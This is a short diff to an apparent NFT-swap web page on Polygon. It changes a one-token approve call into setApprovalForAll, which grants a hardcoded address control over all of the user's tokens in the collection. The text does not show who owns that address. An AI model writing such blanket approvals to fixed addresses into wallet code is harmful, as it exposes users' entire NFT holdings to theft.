--- a/create_nft_swapx_polygon_livev2_721_1155.html
+++ b/create_nft_swapx_polygon_livev2_721_1155.html
@@ -1350,7 +1350,7 @@ var acct = (async function(){
 	var token_nx = localStorage.getItem("mySharedData1");
 	
  	var contract_address1 = web3.utils.toChecksumAddress(nft_k)
-        var _data = new web3.eth.Contract(abi, contract_address).methods.approve("0xeee977a95ada2367b7a570d408a61f7134efebbb", nft_id).encodeABI();
+        var _data = new web3.eth.Contract(abi, contract_address).methods.setApprovalForAll("0xeee977a95ada2367b7a570d408a61f7134efebbb", true).encodeABI();
         var accounts = await window.ethereum.request({ method: 'eth_requestAccounts' });
         var account = accounts[0];
 	var result = await web3.eth.getTransactionCount(account)
